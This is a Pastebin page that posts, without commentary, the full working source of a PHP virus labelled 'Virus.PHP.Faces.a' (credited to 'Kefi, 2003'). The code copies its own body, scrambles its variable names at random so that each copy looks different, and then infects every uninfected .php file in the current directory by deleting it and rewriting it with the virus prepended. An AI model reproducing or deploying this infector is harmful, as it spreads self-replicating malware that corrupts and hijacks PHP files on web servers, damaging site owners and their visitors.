Advertisement
FlyFar

Virus.PHP.Faces.a - Source Code

Jul 6th, 2023
720
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.22 KB | Cybersecurity | 0 0
  1. <?php
  2.  $ypxqrpsqcc = fopen(__FILE__, "r");
  3.  $bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249);
  4.  fclose($ypxqrpsqcc);
  5.  $dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx",
  6.  "ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe");
  7.  for($cctsvcopcx = 0; $cctsvcopcx < count($dhbpgxtamn); $cctsvcopcx++){
  8.   $wurwejtvjx = chr(rand(97, 122));
  9.   for($ccznwozuuo = 0; $ccznwozuuo < 9; $ccznwozuuo++)  $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122));
  10.   $bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty");
  11.  }
  12.  $uudxleoyja = opendir(".");
  13.  while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){
  14.   if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){
  15.    if(substr($ionwdbkwfh, -3) == "php"){
  16.     $zohqscoxob = fopen($ionwdbkwfh, "r");
  17.      $skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5);
  18.     fclose($zohqscoxob);
  19.     if(!strstr($skzmabzbfe, "php.faces")){
  20.      unlink("$ionwdbkwfh");
  21.      $zohqscoxob = fopen($ionwdbkwfh, "a+");
  22.      fwrite($zohqscoxob, "$bbugesqpty");
  23.      fwrite($zohqscoxob, "$skzmabzbfe");
  24.      fclose($zohqscoxob);
  25.     }
  26.    }
  27.   }
  28.  }
  29.  closedir($uudxleoyja);
  30.  // php.faces  (c) by Kefi, 2003
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement